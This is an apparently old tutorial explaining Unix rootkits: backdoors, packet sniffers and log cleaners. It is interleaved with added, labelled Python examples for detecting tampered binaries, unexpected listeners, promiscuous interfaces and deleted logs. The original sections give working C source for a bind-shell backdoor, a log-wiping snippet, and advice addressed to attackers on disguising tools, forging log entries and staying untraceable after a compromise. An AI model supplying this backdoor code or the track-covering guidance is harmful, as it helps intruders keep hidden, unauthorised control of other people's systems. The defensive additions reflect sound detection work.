An Explanation of Rootkits

This whitepaper will help you grasp and understand the concept of "rootkits".

I will try to explain it in an easy-to-follow format.

Previous knowledge of *nix operating systems will help you with this tutorial; it is written for roughly the beginner/intermediate skill range.

It is strongly recommended that before you even attempt to compile or use any of the rootkits mentioned in this paper, you know EXACTLY what you are doing and you are running such programs in a controlled environment. A controlled environment would be a stand-alone PC disconnected from all forms of communication (network, Internet, intranet etc.). An uncontrolled environment would be a PC connected to the Internet or a network (your company's network would be a very stupid choice!)

This brings us to the "Disclaimer"...
********************************************** DISCLAIMER **********************************************

This information has been written for educational purposes only. If you do something stupid with it, then you deserve to be locked in a federal pound-me-in-the-arse prison.

1.3 - What is a root kit?

A rootkit is a program that can be found or created in many different shapes and styles, some more advanced than others.

Rootkits are basically programs that help attackers keep their position as root, 'root' meaning the highest level of administrative access on *nix-based systems.
Rootkits contain tools which help attackers hide their presence and give the attacker continuous full control of the server or host without being noticed.
Rootkits are usually installed once a system has been compromised and the highest level of access has been gained (usually root).

Once the system has been successfully compromised and the attacker has root, he or she may then install the rootkit, allowing them to cover their tracks and wipe the log files, amongst other things.

A typical rootkit consists of the following utilities, though this list is not all-inclusive.
(Note: We will look at these in a lot more detail later on.)

    Backdoor Programs - login backdoors, telnetd etc
    Packet Sniffers - Sniff network traffic such as FTP, TELNET,POP3
    Log-Wiping Utilities - Bash the logs to cover tracks
    DDoS Programs - Turn the box into a DDoS (denial of service) client
    IRCBots - Bots used to take over IRC channels
    Miscellaneous programs - May contain exploit, log editor


(Don't worry too much if you don't understand any of the above; as I said, we'll look at all of this in a lot more detail further down.)

1.4 - Hacker Jargon Definition

"rootkit: /root´kit/, n. A kit for maintaining root; an automated cracking tool. What script kiddies use. After a cracker has first broken in and gained root access, he or she will install modified binaries such as a modified version of login with a backdoor, or a version of ps that will not report the cracker's processes. This is a rootkit."

1.5 - Hacker or Script kiddie

Now the question you are probably asking yourself is "Is a rootkit a hacker's tool or just another script kiddie tool?" Well, the "Hacker Jargon" defines a rootkit as a script kiddie's tool, and to some extent it is right: rootkits don't really require that much skill to run or use. Most rootkits can be compiled like this...

gcc t0rn.c -o rootkit
then...

./rootkit
Note: obviously, when compiling any "hacker" tool you need to choose a name which disguises its purpose, so rootkit would be a really stupid choice.

However, there are some rootkits that require more skill to run and use. Some rootkits require you to edit the source code before it is compiled, and some even need you to edit the iptables rules and the kernel. (A good example would be a rootkit that was used in 2002 at the Black Hat Conference.)

1.6 - Who uses rootkits and why?

I have already covered this in the previous sections; however, I will summarize what we have learned so far...

    Hackers and script kiddies use rootkits.
    They are used to maintain root and cover tracks.
    Most script kiddies lack knowledge of *how* a rootkit really works, and most often they will end up deleting key binary files. (Basically, script kiddies will let you know when they have compromised your system.)
    Rootkits are only installed when the system has been compromised and root has been gained.




1.7 - The Language rootkits are coded in

Most rootkits are coded in C or assembly (shellcode). Most of the well-known rootkits are coded in C so the attacker can edit the source code to fit the target's specification.

1.8 - Different types of rootkits

At this time there are 2 "main" types of rootkits.

    Application rootkits - Established at the application layer
    Kernel rootkits - Established at the kernel level (the core of any OS)


Application rootkit

An application rootkit is basically a rootkit which "replaces" the well-known system binaries (ls, netstat, killall) with "fake" or "Trojaned" ones. The trojaned or fake system files help hide the attacker's presence, report false information to the system administrator and even provide a backdoor for the attacker.

Remember, this section has only been written so you can distinguish the difference between an "Application" rootkit and a "Kernel" rootkit.
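As an added example (not part of the original paper), here is the small integrity check an administrator would use to catch the binary replacement just described: it records a SHA-256 baseline of watched binaries and later reports any whose digest no longer matches. The binary names come from the page; the directory, the fake file contents and the tampering of "netstat" inside demo() are constructed for the demonstration.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Binaries the page names as typical replacement targets. On a real host these
# would be looked up under /bin, /usr/bin etc.; here the directory is a parameter.
WATCHED_BINARIES = ["ls", "netstat", "killall", "ps", "login"]


def sha256_file(path):
    """Hex SHA-256 of a file, read in 64 KiB chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(bin_dir, names=WATCHED_BINARIES):
    """Hash every watched binary under bin_dir -> {name: digest or None}.
    A missing binary is recorded as None so its later appearance is flagged too."""
    baseline = {}
    for name in names:
        path = Path(bin_dir) / name
        baseline[name] = sha256_file(path) if path.is_file() else None
    return baseline


def changed_binaries(bin_dir, baseline):
    """Re-hash and return, sorted, the names whose digest no longer matches."""
    current = take_baseline(bin_dir, list(baseline))
    return sorted(name for name in baseline if current[name] != baseline[name])


def demo():
    """Constructed scenario: fake 'binaries' in a temp dir, a baseline taken,
    then netstat replaced with different contents (what an application rootkit
    does). Returns the list of binaries the check flags."""
    with tempfile.TemporaryDirectory() as bin_dir:
        for name in WATCHED_BINARIES:
            (Path(bin_dir) / name).write_text("#!/bin/sh\necho genuine %s\n" % name)
        baseline = take_baseline(bin_dir)
        # The baseline must live where the attacker cannot rewrite it
        # (read-only media or another host); here it is only serialised.
        stored = json.dumps(baseline)
        (Path(bin_dir) / "netstat").write_text("#!/bin/sh\necho trojaned netstat\n")
        return changed_binaries(bin_dir, json.loads(stored))


if __name__ == "__main__":
    print("changed since baseline:", demo())
```

The check is only as good as the baseline's storage and the tools used to take it: if the hashing program, or the kernel's read path, is itself trojaned (the kernel rootkit case), the digests can lie, so the baseline belongs on read-only media or another host and the comparison is best run from trusted boot media.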

Kernel rootkit

A kernel rootkit is a rootkit that buries itself deep in the kernel. This makes it extremely hard to detect and remove.

Kernel rootkits are more advanced than application rootkits.

A kernel rootkit works by exploiting and manipulating kernel capabilities.

Now I don't really want to go into much detail on kernel rootkits because they are quite advanced and this is not an advanced guide, but I will cover them a little later in the paper.


2 - Backdoors
Most of today's (decent) rootkits contain "Backdoors".
Now you should all know what a backdoor is, but just in case you don't, I will give a brief explanation.

Backdoor -
A program or script which allows an attacker to establish some form of privilege and remote communication without logging into the system.

Backdoors are usually installed once the system has been successfully compromised through some form of exploit.
The advantage of installing a backdoor on a system is that the attacker doesn't have to keep using the same exploit over and over again.

The disadvantage of installing a backdoor is that at one point or another the system administrator will notice suspicious activity in the network traffic; if he or she were to run a port scanner such as Nmap, they would uncover the open port and remove the backdoor.

A typical example of a Windows NT/2000 backdoor is one entitled "Tini.exe" (made by NTSecurity). This little program listens on port 7777 for incoming connections; once a connection has been established, a remote command shell is executed for the attacker who made the connection.
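As an added example that is not part of the original text, here is the administrator's side of that observation done from the host itself rather than with Nmap: it reads sockets in the LISTEN state from /proc/net/tcp and flags any port not on an allow-list. The sample table is constructed in the /proc/net/tcp format; it contains listeners on 22 and 80 (the assumed allow-list) and on 7777, the port the page names for Tini, plus one established connection that is not a listener.

```python
import socket

# Constructed sample in the format of /proc/net/tcp. Addresses are hex with the
# port after the colon; the "st" column 0A is LISTEN, 01 is ESTABLISHED.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 10002 1 0000000000000000 100 0 0 10 0
   2: 00000000:1E61 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10003 1 0000000000000000 100 0 0 10 0
   3: 0100007F:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 10004 1 0000000000000000 20 4 30 10 -1
"""

TCP_LISTEN = 0x0A


def hex_addr(field):
    """'0100007F:0016' -> ('127.0.0.1', 22). The kernel prints the IPv4 address in
    host byte order, so on little-endian machines the bytes must be reversed."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(bytes.fromhex(ip_hex)[::-1])
    return ip, int(port_hex, 16)


def listening_sockets(proc_net_tcp_text):
    """Parse /proc/net/tcp text -> [(ip, port, uid, inode)] for LISTEN sockets."""
    listeners = []
    for line in proc_net_tcp_text.splitlines()[1:]:   # first line is the header
        fields = line.split()
        if len(fields) < 10:
            continue
        if int(fields[3], 16) != TCP_LISTEN:
            continue
        ip, port = hex_addr(fields[1])
        listeners.append((ip, port, int(fields[7]), int(fields[9])))
    return listeners


def unexpected_listeners(proc_net_tcp_text, allowed_ports):
    """Ports in LISTEN state that are not on the administrator's allow-list."""
    return sorted(port for _, port, _, _ in listening_sockets(proc_net_tcp_text)
                  if port not in allowed_ports)


def check_live_host(allowed_ports):
    """The same check against the real /proc/net/tcp of this machine (Linux only)."""
    with open("/proc/net/tcp") as f:
        return unexpected_listeners(f.read(), allowed_ports)


if __name__ == "__main__":
    print("unexpected listening ports:",
          unexpected_listeners(SAMPLE_PROC_NET_TCP, {22, 80}))
```

Reading /proc directly sidesteps a trojaned netstat binary (section 1.8), but not a kernel rootkit that filters /proc itself, which is why a scan from a second machine, as the paper describes with Nmap, remains a useful cross-check; the uid and inode columns let you tie a suspicious listener back to a process via /proc/<pid>/fd.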

*nix backdoors come in *many* shapes and sizes.

    Login backdoor - Modifying login.c to check for a backdoor password before the stored password. The attacker can log into any account using the backdoor password.
    Telnetd backdoor - Trojaning "in.telnetd" to let the attacker gain access with a backdoor password.
    Services backdoor - Replacing and manipulating services like "ftp", "rlogin", even "inetd", to act as a backdoor and gain access.
    Cronjob backdoor - A backdoor can also be added as a cron job to run at a specific time, for example between 12 midnight and 1 am.
    Library backdoors - Almost every UNIX and Windows system has shared libraries. Shared libraries can be backdoored to carry out malicious activity, including giving root or administrator access.
    Kernel backdoors - This backdoor basically exploits the kernel, the core of the operating system, to run and hide the backdoor effectively.
    Network traffic backdoors, typically using TCP, UDP and ICMP - Backdoors that exploit network protocols are widely used. Among TCP backdoors, ssh is popular because its communication is encrypted, while crafting and tunnelling packets in UDP and ICMP traffic gives a better chance of escaping the firewall and "netstat".


To finish off this section on backdoors, I feel like adding some source code. (This is a basic TCP backdoor for *nix; if you don't own a copy of Linux or Unix, don't even attempt to compile this.)


/* backdoor.c - basic unix tcp backdoor.
 *
 * This is a basic UNIX TCP backdoor. /bin/sh is bound to the port of your
 * choice. Access the shell with telnet or netcat:
 *
 * root# nc -v hackedhost.com 1337
 *
 * I do not take responsibility for this code.
 */

#include <stdio.h>
#include <stdlib.h>        /* exit(), atoi() */
#include <unistd.h>        /* dup2(), execl(), close() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define BACKLOG 5
#define SHELL "/bin/sh"

void usage(char *progname);

int main(int argc, char *argv[]) {
    int sock, csock;
    struct sockaddr_in client;
    struct sockaddr_in mine;

    if(argc < 2) {
        usage(argv[0]);
    }

    if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("Couldn't make socket!\n");
        exit(-1);
    }

    /* bind to the port given on the command line, on every interface */
    mine.sin_family = AF_INET;
    mine.sin_port = htons(atoi(argv[1]));
    mine.sin_addr.s_addr = INADDR_ANY;
    if(bind(sock, (struct sockaddr *)&mine, sizeof(struct sockaddr)) == -1) {
        printf("Could not bind socket!\n");
        exit(-1);
    }

    if(listen(sock, BACKLOG) == -1) {
        printf("Could not listen on socket!\n");
        exit(-1);
    }

    printf("Listening for connections on port %s!\n", argv[1]);

    while(1) {
        socklen_t sin_size = sizeof(struct sockaddr);
        csock = accept(sock, (struct sockaddr *)&client, &sin_size);
        /* the shell's stdin, stdout and stderr all become the client socket */
        dup2(csock, 0);
        dup2(csock, 1);
        dup2(csock, 2);
        execl(SHELL, SHELL, (char *)0);
        close(csock);
    }
}

void usage(char *progname) {
    printf("Usage: %s <port>\n", progname);
    exit(-1);
}

The main purpose of showing you this source is to give you a general idea of what a rootkit consists of. Remember, rootkits come in many shapes and sizes, and every rootkit is most likely to contain some form of backdoor...
So what else do rootkits contain apart from backdoors? "Sniffers".

2.1 - Sniffers
A lot of today's rootkits contain programs known as "Sniffers" (also known as packet sniffers). What are sniffers?

Packet sniffers are programs made to "monitor" network traffic: TCP/IP or any other network protocol or device. I'm sure you know that when you are browsing the Internet or playing online games, "packets" of data are going to and from your computer.
Attackers install sniffers so they can capture valuable information which is flowing to and from your computer. What type of valuable information? Here is a list of what a sniffer is capable of...

    Sniffing FTP passwords
    Sniffing Telnet passwords
    Sniffing Network passwords
    Sniffing POP3 passwords
    Capturing websites you have visited
    Sniffing Gateways
    And of course much, much more


Some of you may be thinking, "Won't my passwords be encrypted as they pass over my network?" To some extent this is true; some services provide encryption (such as e-mail if you were using PGP, where sniffing would be useless, unless of course you're a good cryptographer).
Other services such as FTP and Telnet transfer their passwords in plain text, so it is easy for an attacker to just capture the packet and dump it into a text editor; it would only take a couple of minutes for an attacker to uncover the plain text password.

Now there is a technical side to sniffers that I don't really want to go into. For more information on sniffers please read http://www.sans.org/infosecFAQ/switchednet/sniffers.htm; this paper was written by Jason Drury and it is quite useful.

Most rootkits DO sometimes contain "ready to run" sniffers, and sniffers are hard to detect once they are running (we'll look at this a little later). The purpose of this section was just to show you WHAT a sniffer is.
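Added example, not from the original paper: one of the few host-side signs of a running sniffer is the interface it captures on. On Linux a sniffer that wants other hosts' traffic puts the interface into promiscuous mode, and the kernel exposes that as the IFF_PROMISC bit (0x100, from <linux/if.h>) in /sys/class/net/<iface>/flags. The flag values in SAMPLE_FLAGS are constructed; read_sysfs_flags() reads the real files when run on a Linux host.

```python
from pathlib import Path

IFF_PROMISC = 0x100   # interface flag bit, value from <linux/if.h>

# Constructed sample of what /sys/class/net/<iface>/flags contains:
# 0x9 = UP|LOOPBACK (lo), 0x1003 = UP|BROADCAST|MULTICAST (a normal NIC),
# 0x1103 = the same NIC with PROMISC set.
SAMPLE_FLAGS = {"lo": "0x9", "eth0": "0x1003", "eth1": "0x1103"}


def is_promiscuous(flags_text):
    """True if the PROMISC bit is set in a flags value such as '0x1103'."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def promiscuous_interfaces(flags_by_iface):
    """Names of the interfaces whose flags have PROMISC set, sorted."""
    return sorted(name for name, flags in flags_by_iface.items()
                  if is_promiscuous(flags))


def read_sysfs_flags(sysfs_net="/sys/class/net"):
    """Collect {iface: flags text} from sysfs (Linux only; empty dict elsewhere)."""
    result = {}
    root = Path(sysfs_net)
    if not root.is_dir():
        return result
    for iface in root.iterdir():
        flags_file = iface / "flags"
        if flags_file.is_file():
            result[iface.name] = flags_file.read_text()
    return result


if __name__ == "__main__":
    print("sample data:", promiscuous_interfaces(SAMPLE_FLAGS))
    print("this host:", promiscuous_interfaces(read_sysfs_flags()))
```

The same bit is what `ip link` prints as PROMISC. Like every check that asks the running kernel about itself, it can be lied to by a kernel rootkit, and a sniffer that only needs the compromised host's own traffic (the backdoor.c shell session, for instance) never needs promiscuous mode at all, so treat a clean result as absence of one symptom, not proof of a clean box.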

2.2 - Cleaners (Log Bashers)
Log bashers (also known as log deleters, log killers and log cleaners): no matter the title, they all do the same thing, delete system log files. System administrators rely on logging as an extra form of security.

Log files keep track of who logged in last and at what time, what programs were run while that user was logged in, etc. Therefore it is exceptionally important for the attacker to destroy ALL traces in the log files.

Note: some of you may be thinking, "If all the log files are deleted, won't this give an indication to the system administrator that their box has been hacked?"

If you're thinking that, then you're dead right. Deleting the log files can sometimes be pretty stupid; the best way to get around the log files is to "edit" the entries, deleting your entries and filling in some false ones.

Another way is to delete the whole log file and then "re-create" it. Here is a VERY simple script I made to demonstrate what I mean...
#include <stdlib.h>   /* system() */

int main(void) {
    system("rm -rf /root/logs/LastEntry.log");   /* delete the log file */
    system("touch /root/logs/LastEntry.log");    /* re-create it, empty, in the same place */
    return 0;
}
Now for those who don't know any C, I shall explain. The first line in main tells the program to remove the file LastEntry.log, i.e. delete it.
The second line tells the program to create a file called LastEntry.log in the exact same location.
So when the system administrator opens the log file he will be confronted with a blank file. (This may be a bit stupid, because if the admin is security-minded he will know the system has been compromised. However, some stupid admins see it as a 'bug', so you get away with it.)
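As an added example (not the author's code), here is the check a security-minded administrator would run against that trick: a file that has been deleted and re-created gets a new inode and a size of zero, so recording (inode, size) periodically and comparing exposes it. The log file name matches the page's snippet; the directory, the sample log line and the fingerprints in the tests are constructed.

```python
import os
import tempfile
from pathlib import Path


def fingerprint(path):
    """Inode number and size of a log file, or None if it is missing."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return {"inode": st.st_ino, "size": st.st_size}


def detect_tampering(previous, current):
    """Compare an earlier fingerprint with the current one. An append-only log
    should keep its inode and never shrink; returns a list of findings
    (an empty list means nothing suspicious)."""
    findings = []
    if previous is None:
        return findings          # nothing recorded yet to compare against
    if current is None:
        return ["log file missing"]
    if current["inode"] != previous["inode"]:
        findings.append("inode changed (file deleted and re-created)")
    if current["size"] < previous["size"]:
        findings.append("file shrank (%d -> %d bytes)"
                        % (previous["size"], current["size"]))
    return findings


def demo():
    """Constructed scenario: record a fingerprint, then do what the page's
    rm + touch snippet does, and run the comparison."""
    with tempfile.TemporaryDirectory() as d:
        log = Path(d) / "LastEntry.log"
        log.write_text("Jan  1 00:00:01 host sshd[123]: Accepted password for alice\n")
        before = fingerprint(log)   # a monitoring job would store this off-host
        log.unlink()                # rm
        log.touch()                 # touch
        after = fingerprint(log)
        return detect_tampering(before, after)


if __name__ == "__main__":
    for finding in demo():
        print("ALERT:", finding)
```

Inode numbers can be reused by some filesystems, so the size drop is the more dependable of the two signals, and a legitimate logrotate run changes both, so the stored fingerprint must be refreshed after rotation. Neither check catches the "edit the entries" approach described above; the real answer to log cleaners of any kind is a copy of the logs shipped to another host as they are written, where the attacker's root on the compromised box does not reach.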

Most rootkits contain some form of log cleaner, but before you execute it you need to make sure you know exactly HOW it works; otherwise you're just another noob who "presumes" this tool will cover your tracks completely.

Some log cleaners search certain directories for files with names like "IP", "Login", "Logs", "Log" etc. and then delete them.
Some just delete all the default log files in the default system location.

Note: Before you compile a rootkit I suggest you learn C and take a look at the source code; you may find you need to edit some of the entries.

It's important you come FULLY prepared before you go out and install your rootkit. I have been doing this long enough to realize that even if you successfully edit or delete a bunch of log files, it doesn't mean you're untraceable. You still need to think about system programs which are running, which may have their own logging capabilities.
